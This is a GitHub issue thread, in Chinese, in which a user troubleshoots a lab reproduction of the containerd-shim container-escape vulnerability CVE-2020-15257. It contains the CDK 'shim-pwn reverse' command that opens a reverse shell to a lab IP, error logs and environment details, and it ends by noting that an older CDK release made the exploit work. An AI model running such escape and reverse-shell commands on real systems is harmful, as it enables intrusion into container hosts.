Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

cve-2020-15257复现报错 #135

Closed
fa1c0n1 opened this issue Dec 22, 2024 · 2 comments
Closed

cve-2020-15257复现报错 #135

fa1c0n1 opened this issue Dec 22, 2024 · 2 comments

Comments

@fa1c0n1
Copy link

fa1c0n1 commented Dec 22, 2024

按照给的writeup 环境是安装成功的,但是执行cdk的exploit的时候报如下错误:

root@ubuntu-attack:/tmp# ./cdk run shim-pwn reverse 192.168.202.128 81
2024/12/22 07:13:52 trying to spawn shell to 192.168.202.128:81
2024/12/22 07:13:52 try socket: @/containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock
2024/12/22 07:13:52 fail to connect unix socket /containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock:
dial unix /containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock: connect: connection refused
2024/12/22 07:13:52 exploit failed.

image

我的环境是 ubuntu18.04.4 LTS
$ uname -a
Linux ubuntu-attack 4.15.0-90-generic #91-Ubuntu SMP Wed Feb 26 09:47:43 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

$ cat /etc/os-release
NAME="Ubuntu"
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic

漏洞环境是通过metarget安装的:
$ containerd -v
containerd github.com/containerd/containerd 1.2.6-0ubuntu1~16.04.6+esm1

$ runc -v
runc version 1.1.4-0ubuntu1~18.04.2
spec: 1.0.2-dev
go: go1.18.1
libseccomp: 2.5.1

$ docker version
Client:
Version: 18.03.1-ce
API version: 1.37
Go version: go1.9.5
Git commit: 9ee9f40
Built: Wed Jun 20 21:43:51 2018
OS/Arch: linux/amd64
Experimental: false
Orchestrator: swarm

Server:
Engine:
Version: 18.03.1-ce
API version: 1.37 (minimum version 1.12)
Go version: go1.9.5
Git commit: 9ee9f40
Built: Wed Jun 20 21:42:00 2018
OS/Arch: linux/amd64
Experimental: false


之后我分别又新开了18.04.6、20.04.5的ubuntu虚拟机,用docker官方下载站 https://download.docker.com/linux/static/stable/ 下载docker相关静态可执行文件进行漏洞环境搭建,也都是报上面这个错,我用socat连接了下这个shim sock,确实是被拒绝的,不知道为什么... 搜了下也没看到有人遇到我这种报错情况。。

$ socat - ABSTRACT-CONNECT:/containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock
2024/12/21 23:24:44 socat[4056] E connect(5, AF=1 "\0/containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock", 99): Connection refused

@fa1c0n1
Copy link
Author

fa1c0n1 commented Dec 22, 2024

woc,解决了。。万万没想到是CDK版本的问题,一开始在github下的最新的 cdk 1.5.4版本,复现一直报上面的错。后来随便下了个 v1.0版本的cdk https://github.com/cdk-team/CDK/releases/tag/v1.0 ,复现成功了。。没分析原理的情况下,直接用别人的exploit复现的缺点体现出来了......
image

@fa1c0n1
Copy link
Author

fa1c0n1 commented Dec 22, 2024

done.

@fa1c0n1 fa1c0n1 closed this as completed Dec 22, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant